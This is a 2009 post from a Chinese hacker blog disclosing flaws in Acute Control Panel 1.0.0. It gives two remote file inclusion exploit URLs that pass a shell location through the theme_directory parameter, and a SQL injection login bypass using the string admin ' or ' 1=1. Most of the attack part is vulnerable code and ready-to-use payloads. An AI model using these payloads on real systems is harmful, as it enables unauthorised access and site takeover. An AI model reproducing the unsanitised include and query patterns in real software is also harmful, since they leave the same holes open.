导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

« Weblogic 0day - JSESSIONID cookie value overflow用system权限登陆3389,让权限变得更强大 »

2009-3-29 0:7:28

Acute Control Panel 1.0.0 三个 SQL注入漏洞及利用

Acute Control Panel 1.0.0 SQL注入

远程文件共享:

漏洞页面:container.php

 

<?php include_once($theme_directory."/sidebar.php"); ?>

利用:

http://127.0.0.1/themes/container.php?theme_directory=[Shell]



漏洞页面:

header.php 



<?php include_once($theme_directory."/navigation.php"); ?> 



利用:

  http://127.0.0.1/themes/header.php?theme_directory=[Shell]



SQL注入:

漏洞页面:login.php

 

$query = mysql_query("SELECT  

id,username,password,email,fullname,permissions FROM `users` WHERE  

username='$username' AND password='$password'", $conn) or 

die(mysql_error());

利用:

用户 : admin ' or ' 1=1

密码: 随便输入或者空密码

原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/AcuteControlPanel.html

Tags: Acute Control Panel  or = or  MySQL注射  php漏洞  
发布:kissjetg | 分类:(D:)PHP程序漏洞 | 评论:0 | 引用:0 | 浏览:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

黑客榜之热文排行

黑客榜之本年排行

黑客榜之本月排行

黑客榜之随机文章

网站分类

搜索内容

最新评论及回复

最近发表

所属分类下的文章

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved